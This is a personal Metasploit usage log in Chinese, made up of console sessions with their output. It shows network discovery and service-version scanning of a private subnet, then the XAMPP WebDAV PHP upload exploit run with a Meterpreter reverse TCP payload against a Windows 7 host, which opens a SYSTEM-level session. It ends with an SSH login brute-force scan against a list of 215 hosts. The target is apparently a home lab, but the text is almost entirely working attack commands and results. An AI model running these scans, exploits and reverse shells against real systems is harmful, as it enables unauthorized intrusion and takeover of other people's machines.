作者:Scanz
更新版本:V1(20180428初版,待更新格式)
个人使用记录
----------------------------------------------
~# /etc/init.d/postgresql start
~# msfdb init
~# msfconsole
msf > db_status
[*] postgresql connected to msf
msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > nessus_connect 'user':'passwd'@127.0.0.1:8834
[*] Connecting to https://127.0.0.1:8834/ as user
[*] User user authenticated successfully
auxiliary/scanner/discovery/arp_sweep
root@kali:~# apt-cache show metasploit-framework | tail -n 6 Description: Framework for exploit development and vulnerability research The Metasploit Framework is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools. Description-md5: c5f73085c4e31aa2cc01dd312ce844cc root@kali:~#
root@kali:~# msfconsole
msf > workspace -a msftest [*] Added workspace: msftest msf
msf > db_nmap -F 192.168.0.1-10
msf > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.0.1 80:c6:ca:00:bf:e8 Unknown device 192.168.0.2 84:1b:5e:e5:66:ae Unknown device 192.168.0.3 84:16:f9:9a:82:51 Unknown device 192.168.0.6 00:0c:29:2b:61:e1 Unknown device 192.168.0.7 b8:27:eb:89:ac:c3 pi-hole Unknown device 192.168.0.8 0c:51:01:e1:8d:27 Unknown device 192.168.0.9 78:ca:39:fe:0b:4c Unknown device msf > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.1 22 tcp ssh open 192.168.0.1 53 tcp domain open 192.168.0.1 80 tcp http open 192.168.0.1 3000 tcp ppp closed 192.168.0.1 8080 tcp http-proxy closed 192.168.0.2 80 tcp http open 192.168.0.2 443 tcp https open 192.168.0.2 5000 tcp upnp open 192.168.0.3 80 tcp http open 192.168.0.6 21 tcp ftp open 192.168.0.6 80 tcp http open 192.168.0.6 135 tcp msrpc open 192.168.0.6 139 tcp netbios-ssn open 192.168.0.6 443 tcp https open 192.168.0.6 445 tcp microsoft-ds open 192.168.0.6 554 tcp rtsp open 192.168.0.6 3389 tcp ms-wbt-server open
msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(ssh_version) > options Module options (auxiliary/scanner/ssh/ssh_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port (TCP) THREADS 1 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the SSH probe msf auxiliary(ssh_version) > services -u -p 22 -R Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.1 22 tcp ssh open 192.168.0.7 22 tcp ssh open RHOSTS => 192.168.0.1 192.168.0.7
msf auxiliary(ssh_version) > setg threads 10 threads => 10 msf auxiliary(ssh_version) > run [*] 192.168.0.7:22 - SSH server version: SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 ( service.version=6.7p1 openssh.comment=Raspbian-5+deb8u3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Raspbian os.device=General os.family=Linux os.product=Linux os.version=8.0 service.protocol=ssh fingerprint_db=ssh.banner ) [*] 192.168.0.1:22 - SSH server version: SSH-2.0-OpenSSH_3.9p1 ( service.version=3.9p1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner ) [*] Scanned 1 of 2 hosts (50% complete) [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed
msf auxiliary(ssh_version) > use auxiliary/scanner/http/http_version msf auxiliary(http_version) > options Module options (auxiliary/scanner/http/http_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 10 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(http_version) > services -u -p 80 -R Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.1 80 tcp http open 192.168.0.2 80 tcp http open 192.168.0.3 80 tcp http open 192.168.0.6 80 tcp http open 192.168.0.7 80 tcp http open RHOSTS => 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.6 192.168.0.7 msf auxiliary(http_version) > run [*] 192.168.0.7:80 lighttpd/1.4.35 ( Debian Default Page ) [*] 192.168.0.2:80 ( 401-Basic realm="NETGEAR R6200" ) [*] 192.168.0.6:80 Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ ) [*] 192.168.0.1:80 Apache ( 302-https://192.168.0.1:10443/manage/dashboard ) [*] Scanned 4 of 5 hosts (80% complete) [*] 192.168.0.3:80 Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" ) [*] Scanned 5 of 5 hosts (100% complete) [*] Auxiliary module execution completed
msf auxiliary(http_version) > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 10 yes The number of concurrent threads msf auxiliary(smb_version) > services -u -p 445 -R Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.6 445 tcp microsoft-ds open 192.168.0.8 445 tcp microsoft-ds open 192.168.0.9 445 tcp microsoft-ds open RHOSTS => 192.168.0.6 192.168.0.8 192.168.0.9 msf auxiliary(smb_version) > run [*] 192.168.0.6:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP ) [*] 192.168.0.9:445 - Host could not be identified: Apple Base Station (CIFS 4.32) [*] 192.168.0.8:445 - Host could not be identified: Apple Base Station (CIFS 4.32) [*] Scanned 3 of 3 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_version) > clear
msf auxiliary(smb_version) > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.0.1 80:c6:ca:00:bf:e8 192.168.0.1 Unknown device 192.168.0.2 84:1b:5e:e5:66:ae 192.168.0.2 Unknown device 192.168.0.3 84:16:f9:9a:82:51 192.168.0.3 RE200 router 192.168.0.6 00:0c:29:2b:61:e1 WIN7-X86 Windows device 192.168.0.7 b8:27:eb:89:ac:c3 pi-hole Linux 8.0 server 192.168.0.8 0c:51:01:e1:8d:27 Unknown device 192.168.0.9 78:ca:39:fe:0b:4c Unknown device msf auxiliary(smb_version) > services -u Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.1 22 tcp ssh open SSH-2.0-OpenSSH_3.9p1 192.168.0.1 53 tcp domain open 192.168.0.1 80 tcp http open Apache ( 302-https://192.168.0.1:10443/manage/dashboard ) 192.168.0.2 80 tcp http open ( 401-Basic realm="NETGEAR R6200" ) 192.168.0.2 443 tcp https open 192.168.0.2 5000 tcp upnp open 192.168.0.3 80 tcp http open Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" ) 192.168.0.6 21 tcp ftp open 192.168.0.6 80 tcp http open Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ ) 192.168.0.6 135 tcp msrpc open 192.168.0.6 139 tcp netbios-ssn open 192.168.0.6 443 tcp https open 192.168.0.6 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP ) 192.168.0.6 554 tcp rtsp open 192.168.0.6 3389 tcp ms-wbt-server open 192.168.0.6 5357 tcp wsdapi open 192.168.0.6 49155 tcp unknown open 192.168.0.6 49156 tcp unknown open 192.168.0.7 22 tcp ssh open SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 192.168.0.7 53 tcp domain open 192.168.0.7 80 tcp http open lighttpd/1.4.35 ( Debian Default Page ) 192.168.0.8 139 tcp netbios-ssn open 192.168.0.8 445 tcp smb open Apple Base Station (CIFS 4.32) 192.168.0.8 548 tcp afp open 192.168.0.8 5009 tcp airport-admin open 192.168.0.8 10000 tcp snet-sensor-mgmt open 192.168.0.9 139 tcp netbios-ssn open 192.168.0.9 445 tcp smb open Apple Base Station (CIFS 4.32) 192.168.0.9 548 tcp afp open 192.168.0.9 5009 tcp airport-admin open 192.168.0.9 10000 tcp snet-sensor-mgmt open
msf auxiliary(smb_version) > services 192.168.0.6 Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.6 21 tcp ftp open 192.168.0.6 80 tcp http open Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ ) 192.168.0.6 135 tcp msrpc open 192.168.0.6 139 tcp netbios-ssn open 192.168.0.6 443 tcp https open 192.168.0.6 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP ) 192.168.0.6 554 tcp rtsp open 192.168.0.6 3389 tcp ms-wbt-server open 192.168.0.6 5357 tcp wsdapi open 192.168.0.6 49155 tcp unknown open 192.168.0.6 49156 tcp unknown open
msf auxiliary(smb_version) > search xampp [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/http/xampp_webdav_upload_php 2012-01-14 excellent XAMPP WebDAV PHP Upload msf auxiliary(smb_version) > use exploit/windows/http/xampp_webdav_upload_php msf exploit(xampp_webdav_upload_php) > options Module options (exploit/windows/http/xampp_webdav_upload_php): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME no The filename to give the payload. (Leave Blank for Random) PASSWORD xampp no The HTTP password to specify for authentication PATH /webdav/ yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections USERNAME wampp no The HTTP username to specify for authentication VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf exploit(xampp_webdav_upload_php) > set rhost 192.168.0.6 rhost => 192.168.0.6
msf exploit(xampp_webdav_upload_php) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline php/bind_perl normal PHP Command Shell, Bind TCP (via Perl) php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6 php/bind_php normal PHP Command Shell, Bind TCP (via PHP) php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6 php/download_exec normal PHP Executable Download and Execute php/exec normal PHP Execute Command php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager php/meterpreter/bind_tcp_ipv6 normal PHP Meterpreter, Bind TCP Stager IPv6 php/meterpreter/bind_tcp_ipv6_uuid normal PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support php/meterpreter/bind_tcp_uuid normal PHP Meterpreter, Bind TCP Stager with UUID Support php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter/reverse_tcp_uuid normal PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline php/reverse_perl normal PHP Command, Double Reverse TCP Connection (via Perl) php/reverse_php normal PHP Command Shell, Reverse TCP (via PHP)
msf exploit(xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(xampp_webdav_upload_php) > options Module options (exploit/windows/http/xampp_webdav_upload_php): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME no The filename to give the payload. (Leave Blank for Random) PASSWORD xampp no The HTTP password to specify for authentication PATH /webdav/ yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.0.6 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections USERNAME wampp no The HTTP username to specify for authentication VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
msf exploit(xampp_webdav_upload_php) > set lhost 192.168.0.15 lhost => 192.168.0.15 msf exploit(xampp_webdav_upload_php) > exploit [*] Started reverse TCP handler on 192.168.0.15:4444 [*] Uploading Payload to /webdav/3vfkVff.php [*] Attempting to execute Payload [*] Sending stage (33986 bytes) to 192.168.0.6 [*] Meterpreter session 1 opened (192.168.0.15:4444 -> 192.168.0.6:51211) at 2017-05-03 17:32:59 -0600
meterpreter> ps
304 taskeng.exe NT AUTHORITY\SYSTEM taskeng.exe 348 csrss.exe NT AUTHORITY\SYSTEM csrss.exe 388 wininit.exe NT AUTHORITY\SYSTEM wininit.exe 400 csrss.exe NT AUTHORITY\SYSTEM csrss.exe 448 winlogon.exe NT AUTHORITY\SYSTEM winlogon.exe 496 services.exe NT AUTHORITY\SYSTEM services.exe 504 lsass.exe NT AUTHORITY\SYSTEM lsass.exe 512 lsm.exe NT AUTHORITY\SYSTEM lsm.exe 612 svchost.exe NT AUTHORITY\SYSTEM svchost.exe 628 xampp-control.exe WIN7-X86\victim xampp-control.exe 676 vmacthlp.exe NT AUTHORITY\SYSTEM vmacthlp.exe 708 svchost.exe NT AUTHORITY\NETWORK SERVICE svchost.exe 760 svchost.exe NT AUTHORITY\LOCAL SERVICE svchost.exe 820 LogonUI.exe NT AUTHORITY\SYSTEM LogonUI.exe 856 svchost.exe NT AUTHORITY\SYSTEM svchost.exe 896 svchost.exe NT AUTHORITY\LOCAL SERVICE svchost.exe
meterpreter > getuid Server username: SYSTEM (0) meterpreter > sysinfo Computer : WIN7-X86 OS : Windows NT WIN7-X86 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586 Meterpreter : php/windows meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.0.6 - Meterpreter session 1 closed. Reason: User exit msf exploit(xampp_webdav_upload_php) > exit root@kali:~# # excellent :) root@kali:~#
RHOSTS file:/tmp/msf-db-rhosts-20171109-128530-1v0kofq
Rhost 文件IP定义 一行一个IP
msf auxiliary(scanner/ssh/ssh_login) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS file:///opt/pass/ip
RHOSTS => file:///opt/pass/ip
msf auxiliary(scanner/ssh/ssh_login) > run
[*] Scanned 22 of 215 hosts (10% complete)
[*] Scanned 45 of 215 hosts (20% complete)
[*] Scanned 65 of 215 hosts (30% complete)
[*] Scanned 87 of 215 hosts (40% complete)
[*] Scanned 109 of 215 hosts (50% complete)
[*] Scanned 129 of 215 hosts (60% complete)
[*] Scanned 152 of 215 hosts (70% complete)
[*] Scanned 173 of 215 hosts (80% complete)
COMMENTS | NOTHING